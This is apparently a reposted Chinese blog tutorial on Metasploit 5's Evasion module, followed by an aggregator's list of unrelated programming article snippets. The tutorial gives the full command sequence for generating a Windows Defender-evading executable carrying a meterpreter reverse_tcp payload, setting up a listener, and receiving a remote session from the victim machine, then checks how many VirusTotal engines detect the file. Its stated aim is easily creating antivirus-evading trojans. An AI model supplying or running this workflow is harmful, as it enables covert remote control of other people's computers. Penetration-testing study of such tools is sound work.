使用metasploit中Evasion模組

阿新 • • 發佈：2019-03-13

簡介

幾天前我說了kali這次更新我最關心的是metasploit升級到了5.0，5.0中有一個新的模組叫Evasion模組，這個模組可以輕鬆的建立反防毒軟體的木馬，今天我們就來試一試

操作

首先開啟metasploit

msfconsole

你會看到下面這個介面

➜  ~ msfconsole
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.



      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
           :kk;.OOOOOOOOOOOOO.;Ok:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
+ -- --=[ 1851 exploits - 1046 auxiliary - 321 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

之後使用evasion模組，首先看看有什麼evasion模組

msf5 > show evasion

evasion
=======

   Name                             Disclosure Date  Rank    Check  Description
   ----                             ---------------  ----    -----  -----------
   windows/windows_defender_exe                      normal  No     Microsoft Windows Defender Evasive Executable
   windows/windows_defender_js_hta                   normal  No     Microsoft Windows Defender Evasive JS.Net and HTA

使用windows/windows_defender_exe這個模組

use windows/windows_defender_exe

檢視要配置的引數

show options

msf5 evasion(windows/windows_defender_exe) > show options

Module options (evasion/windows/windows_defender_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  oDlIipoP.exe     yes       Filename for the evasive file (default: random)


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows

就一個檔名引數可以配置

set FILENAME bboysoul.exe

之後使用reverse_tcp payload

set payload windows/meterpreter/reverse_tcp

設定埠和ip

set LHOST 10.10.10.186

set LPORT 4444

生成木馬檔案

exploit

之後開啟一個監聽埠

use multi/handler

設定payload

set payload windows/meterpreter/reverse_tcp

設定主機和埠

set LHOST 10.10.10.186

set LPORT 4444

執行

exploit

接著我們把生成出來的木馬在遠端要被控制的windows機器上執行我們這裡就可以接收到這個回話了

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.10.186:4444

^@[*] Sending stage (179779 bytes) to 10.10.10.167
[*] Meterpreter session 1 opened (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800

上面都是常規操作，之後我們掃描病毒

開啟

www.virustotal.com

放入檔案掃描

只有33個病毒引擎掃描出來了，說明還可以

歡迎關注Bboysoul的部落格www.bboysoul.co

使用metasploit中Evasion模組

開發十年，就只剩下這套架構體系了！ >>>

使用metasploit中Evasion模塊

tst lis 使用 run 配置操作 package opened 病毒　　簡介　　　　幾天前我說了kali這次更新我最關心的是metasploit升級到了5.0，5.0中有一個新的模塊叫Evasion模塊，這個模塊可以輕松的創建反殺毒軟件的木馬，今天我們就來試一試　

python中multiprocessing模組之Pipe管道

原文地址，本文在原文基礎上添加了部分註釋。 multiprocessing.Pipe([duplex]) 方法返回2個連線物件(conn1, conn2),代表管道的兩端,預設duplex為True，是雙向通訊。如果duplex為False，則conn1只能用來接收訊息，conn2只能用來

HighGo Database中auto_explain模組的使用介紹

目錄文件用途詳細資訊文件用途當我們想要跟蹤大型應用中未優化的查詢時，可使用auto_explain模組提供的一種自動的記錄慢速語句執行計劃的方法。這種方法可以讓我們不必手動的執行EXPLAIN語句，所以使用這種方式是很有幫助的。詳細資訊 1、使用方

python中os模組的作用

簡介 OS模組簡單的來說它是一個Python的系統程式設計的操作模組，可以處理檔案和目錄這些我們日常手動需要做的操作。如果你希望你的程式能夠與平臺無關的話，這個模組是尤為重要的。常用函式和變數 os.sep可以取代作業系統特定的路徑分隔符。windows下為 “\” os.

Python中Matplotlib模組的簡單使用

目錄 Matplotlib pyplot類 pyplot.plot() 配置屬性 pyplot.subplot() Matplotlib Matplotlib 是 Python 2D 繪圖領域使用最廣泛的套件。它能讓使用者很輕鬆地將資料圖形化，並且提供多樣化的輸出格式

Python中Numpy模組的使用

目錄 NumPy ndarray物件 Numpy資料型別 Numpy陣列屬性 NumPy NumPy(Numerical Python) 是 Python 的一個擴充套件程式庫，支援大量的維度陣列與矩陣運算，此外也針對陣列運算提供大量的數學函式庫。Nupmy可用來儲存和處

tensorflow中slim模組api介紹

github：https://github.com/tensorflow/tensorflow/tree/master/tensorflow/contrib/slim TensorFlow-Slim TF-Slim is a lightweight library for definin

scrapy框架中Crawlspider模組原始碼剖析

一、前言 1、scrapy從Terminal中通過genspider命令建立一個蜘蛛，其中包含四個模組，分別為spider，crawlspider，csvfeedspider和xmlfeedspider，其中spider(basic模組)和crawlspider最為常用。 2、做過web

Python中 Wxpy模組以及其監控

概述: 　　本文主要分享一下博主在學習wxpy 的過程中開發的一個小程式。博主在最近有一個監控報警的需求需要完成，然後剛好在學習wxpy 這個東西，因此很巧妙的將工作和學習聯絡在一起。　　博文中主要使用到的技術設計到Python，Redis，以及Java。涉及到的技術看

Python中logging模組

1、日誌級別日誌級別數值 Critical 50 Error 40 Warning 30 Info 20

Python中shodan模組的使用

關於shodan的安裝和使用，傳送門——> 滲透測試之Shodan的安裝和使用常用 Shodan 庫函式 shodan.Shodan(key) ：初始化連線API Shodan.count(query, facets=None)：返回查詢結果數量

Android中的模組(module)與裝置(device)

轉自 https://blog.csdn.net/a345017062/article/details/6423866 以backlight這種裝置為例來說明一下Android系統中模組與裝置的關係。Android中的backlight、keyboard等多個裝置都

關於Python3.6中Twisted模組安裝的問題

今天準備學習爬蟲的scrapy模組，在這之前需要安裝許多別的模組，Twisted就是其一一開始想著直接用pycharm來安裝就行了，沒想到安裝了一會就報錯了，如下後來就換到命令提示符來安裝，在官網發現直接pip安裝就行了 pip install Twisted 當我以為一切順利的

python 歷險記(五）—— python 中的模組

目錄前言基礎模組化程式設計模組化有哪些好處? 什麼是 python 中的模組？引入模組有幾種方式？模組的查詢順序模組中包含執行語句的情況用 dir() 函式來窺探模組 python 的內建模組有哪些？結語參考文件

python中socket模組詳解

socket模組簡介網路上的兩個程式通過一個雙向的通訊連線實現資料的交換，這個連線的一端稱為一個socket。socket通常被叫做“套接字”，用於描述IP地址和埠，是一個通訊鏈的控制代碼，可以用來實現不同虛擬機器或不同計算機之間的通訊。在Internet上的主機一般運行了多個服務

python中configparser模組的使用

configparser模組用於生成和修改常見配置文件，當前模組的名稱在 python 3.x 版本中變更為 configparser。首先要寫一個如下所示的配置檔案： [DEFAULT] serveraliveinterval = 45 compression = yes c

VLC 中LIVE555模組編譯遇到的奇怪報錯

VS版VLC中對LIVE555加註釋遇到了一個奇怪報錯現象，記錄如下： p_sys->rtsp->sendSetupCommand( *sub, default_live5

Boost中Core模組的enable_if用法及說明

標頭檔案 boost/utility/enable_if.hpp 作用 enable_if，lazy_enable_if，disable_if，lazy_disable_if 作用說明 enable_if 說明 template <class Cond, class T =

Boost中Core模組的demangle用法及說明

標頭檔案 boost/core/demangle.hpp 作用我們都知道，C++中，編譯變數，類，及全域性函式，編譯後的名稱，已經發生了改變，我們稱之為新增修飾。那麼，我們有什麼方法將這種修飾，擦除掉呢？，demangle能夠幫助我們完成這一項功能。舉例 boost::co

使用metasploit中Evasion模組

簡介

操作

相關推薦